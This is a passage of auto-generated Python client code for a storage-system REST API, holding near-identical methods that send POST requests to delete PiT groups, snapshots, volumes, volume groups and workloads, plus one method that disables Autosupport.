path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_pit_consistency_group(self, system_id, body, **kwargs):
"""
This procedure will delete an existing PiT consistency group, all of the child PiT groups and their PiTs and associated ERVs. All associated views are stopped.
Documented return codes: ok.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_pit_consistency_group(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param PITConsistencyGroupDeletionDescriptor body: Descriptor for the consistency group to be deleted. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_pit_consistency_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_pit_consistency_group`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_pit_consistency_group`")
resource_path = '/storage-systems/{system-id}/symbol/deletePITConsistencyGroup'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_pit_consistency_group_view(self, system_id, body, **kwargs):
"""
This procedure will delete the specified PITConsistencyGroupView.
Documented return codes: ok, operationFailedVolumeCopyClone.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_pit_consistency_group_view(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param PITConsistencyGroupViewDeletionDescriptor body: An object containing all of the attributes required to delete a PiT Consistency Group View. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_pit_consistency_group_view" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_pit_consistency_group_view`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_pit_consistency_group_view`")
resource_path = '/storage-systems/{system-id}/symbol/deletePITConsistencyGroupView'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_pit_group(self, system_id, body, **kwargs):
"""
This procedure will delete a PiT Group.
Documented return codes: ok, rollbackInProgress, invalidPitGroupRef, pitGroupInConsistencyGroup, operationFailedVolumeCopyClone.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_pit_group(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param PITGroupDeletionDescriptor body: Structure containing PiT group reference data. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_pit_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_pit_group`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_pit_group`")
resource_path = '/storage-systems/{system-id}/symbol/deletePITGroup'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_pit_view(self, system_id, body, **kwargs):
"""
This procedure will delete an existing PiT View.
Documented return codes: ok, operationFailedVolumeCopyClone.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_pit_view(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param PITViewDeletionDescriptor body: Structure containing information about the PiT View to delete. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_pit_view" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_pit_view`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_pit_view`")
resource_path = '/storage-systems/{system-id}/symbol/deletePITView'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_sa_port_group(self, system_id, body, **kwargs):
"""
Removes all SAPorts from an SAPortGroup, and deletes the group. OBSOLETE: Any call to deleteSAPortGroup will get a return status indicating the command is obsolete. No alternative procedure is available.
Documented return codes: ok.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_sa_port_group(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_sa_port_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_sa_port_group`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_sa_port_group`")
resource_path = '/storage-systems/{system-id}/symbol/deleteSAPortGroup'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_schedule_list(self, system_id, body, **kwargs):
"""
This procedure will delete a list of schedules.
Documented return codes: ok.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_schedule_list(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param ScheduleRefList body: A list of schedule references. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_schedule_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_schedule_list`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_schedule_list`")
resource_path = '/storage-systems/{system-id}/symbol/deleteScheduleList'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_snapshot(self, system_id, body, **kwargs):
"""
Deletes the snapshot volume identified by the input argument. All data on the volume is lost and all resources associated with maintaining the snapshot are released.
Documented return codes: ok.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_snapshot(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: A SYMbol reference to the snapshot volume that is to be deleted. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_snapshot" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_snapshot`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_snapshot`")
resource_path = '/storage-systems/{system-id}/symbol/deleteSnapshot'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_volume(self, system_id, body, **kwargs):
"""
This procedure is used to delete a Thin Volume. The procedure has been deprecated for deleting RAID Volumes - it has been replaced by the procedure deleteVolumeFromGroup.
Documented return codes: ok, illegalParam, noHeap, volumeReconfiguring, reservationConflict, internalError, volumeFormatting, invalidVolumeref, volumeOffline, repositoryOffline, repositoryReconfiguring, rollbackInProgress, repositoryMissing, volumeHasMirrorRelationship, volumeInUse.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_volume(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: The value of the AbstractVolRef for the volume to be deleted. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_volume" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_volume`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_volume`")
resource_path = '/storage-systems/{system-id}/symbol/deleteVolume'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_volume_from_group(self, system_id, body, **kwargs):
"""
This procedure deletes the volume referenced by the input argument. The procedure allows the caller to specify which behavior is desired for the case of deleting the last volume in the volume group - either delete or retain the volume group.
Documented return codes: ok.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_volume_from_group(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param VolumeDeletionDescriptor body: A VolumeDeletionDescriptor which contains (1) a reference to the volume to delete and (2) a boolean indicator, which indicates whether to delete or retain the volume group when the last volume in the group is deleted. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_volume_from_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_volume_from_group`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_volume_from_group`")
resource_path = '/storage-systems/{system-id}/symbol/deleteVolumeFromGroup'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_volume_group(self, system_id, body, **kwargs):
"""
Delete VolumeGroup and all Volumes in that group
Documented return codes: ok, volumeInUse.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_volume_group(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str body: A reference to the volume group that is to be deleted. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_volume_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_volume_group`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_volume_group`")
resource_path = '/storage-systems/{system-id}/symbol/deleteVolumeGroup'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_workload(self, system_id, body, **kwargs):
"""
This procedure removes the specified application awareness workloads. It is not an error to remove in-use (association mapped) workloads. All association mappings for the workload are removed including any KeyValueTag mappings. The actual KeyValueTag records are not deleted.
Documented return codes: ok.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_workload(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param WorkloadRefList body: A list of SYMbol application awareness workload references. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_workload" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_workload`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_workload`")
resource_path = '/storage-systems/{system-id}/symbol/deleteWorkload'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_delete_workload_volume_mapping(self, system_id, body, **kwargs):
"""
This procedure deletes the specified workload to volume mappings.
Documented return codes: ok.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_delete_workload_volume_mapping(system_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param WorkloadVolumeDeleteMappingDescriptorList body: A list of unique identifiers to the workload to volume mappings to be deleted. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'body', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_delete_workload_volume_mapping" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
if ('system_id' not in params) or (params['system_id'] is None):
raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_workload_volume_mapping`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `symbol_delete_workload_volume_mapping`")
resource_path = '/storage-systems/{system-id}/symbol/deleteWorkloadVolumeMapping'.replace('{format}', 'json')
path_params = {}
if 'system_id' in params:
path_params['system-id'] = params['system_id']
query_params = {}
if 'controller' in params:
query_params['controller'] = params['controller']
if 'verbose_error_response' in params:
query_params['verboseErrorResponse'] = params['verbose_error_response']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basicAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def symbol_disable_asup(self, system_id, **kwargs):
"""
This procedure is used to disable Autosupport.
Documented return codes: ok, notImplemented.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.symbol_disable_asup(system_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
:param str controller: Controller selection
:param bool verbose_error_response:
:return: str
If the method is called asynchronously,
returns the request thread.
:raises: ValueError
If the required params are not provided or if the response data format is unknown.
TypeError:
When the data type of response data is different from what we are expecting
ApiException:
Occurs when we get a HTTP error code (422 and above).
"""
all_params = ['system_id', 'controller', 'verbose_error_response']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method symbol_disable_asup" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'system_id' is set
